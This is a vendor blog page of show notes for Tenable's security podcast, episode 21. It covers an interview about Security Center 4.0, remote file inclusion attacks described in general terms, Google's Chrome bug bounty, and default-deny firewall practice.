Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Tenable Network Security Podcast - Episode 21

Welcome to the Tenable Network Security Podcast - Episode 21

Announcements


Interview: Ron Gula - Security Center Version 4

1848_ron_gula.jpg
Tenable CEO Ron Gula and I discuss the features of Security Center and some of the recent enhancements being made in the new version 4.0.

Stories

  • Holy RFI Batman! - Rsnake has published a list of web applications that are allowing an RFI attack to occur. This attack vector allows the bad guys to potentially run code on the remote server and clients visiting the site. These attacks can also lead to Local File Inclusion, allowing attackers to read files on the remote host. I've also found a list of remote file inclusion vulnerabilities that were harvested from the OSVDB. This is a pretty common attack vector commonly used by attackers to drop in some malicious JavaScript code into web sites.
  • Google Willing to Pay For Bugs In Chrome - Google has announced that they will pay up to $1,337 for bugs that are found in the Chrome browser and $500 for lesser severity bugs. You can look at this two ways. First, my inclination is to state that Google is a large enough company that they should be implementing secure coding practices and have a team dedicated to the security of Chrome. It is likely they have this, however on the flip side, giving incentive to millions of people to find bugs is something Google could not do on their own. So, they offer a reward for bugs to harness the power of the Internet community to make their software better. The problem is two fold, if you are a "whitehat" hacker you can make more money selling it to other organizations or stand up to a moral code and provide Google the details without asking for anything in return. Regardless of where you stand on that issue, Google's bounty for vulnerabilities is not in tune with reality. The other factor is that if a "blackhat" hacker were to find a bug, they may decide to keep it for themselves and use it to compromise systems and make money through a botnet or pop-up ads. They may also decide to sell it on the black market to other "blackhats".
  • Network Security Fundamentals - Default Deny - Ah yes, the wonders of firewall administration and "default deny". I remember it vividly during my time (an extended period of time, mind you) as a firewall administrator. Many subnets within the organization were implementing the reverse of "default deny", "default accept" and blocking only the exceptions. This was a bad place to be because going to a "default deny" in this situation would almost certainly break things, and lead to cranky users. It was a long process of analyzing traffic to see what needed to be allowed and adding rules. Was it worth it? Maybe, over time my opinion of firewalls is changing. I'm still in favor of using firewalls, but in many situation I believe more effort should be places on system hardening. This includes using the principal of least privilege, applying software updates, turning off unnecessary services, and tuning the configuration to be "secure" (as in enabling the security features). Lets face it, the firewall only blocks a certain class of attacks, which is important, but lets not forget about security completely because we have a firewall. I like to extend the "default deny" to other aspects of security, such as system hardening (why do we have so-called "default" passwords!), and host intrusion prevention client software (why do we allow DLL injections and embedded iFrames?).

Related Posts

Subscribe to the Tenable Blog

Subscribe
Try for Free Buy Now

Try Tenable.io

FREE FOR 60 DAYS

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Sign up now.

Buy Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

65 assets

$2,190.00

Buy Now

Try for Free Buy Now

Try Nessus Professional Free

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy Nessus Professional

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save

Try for Free Buy Now

Try Tenable.io Web Application Scanning

FREE FOR 60 DAYS

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Buy Tenable.io Web Application Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578.00

Buy Now

Try for Free Contact Sales

Try Tenable.io Container Security

FREE FOR 60 DAYS

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

Buy Tenable.io Container Security

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

Learn More about Industrial Security

Get a Demo of Tenable.sc

Please fill out the form below with your contact information and a sales representative will contact you shortly to schedule a demo. You may also include a short comment (limited to 255 characters). Please note that fields with asterisks (*) are mandatory.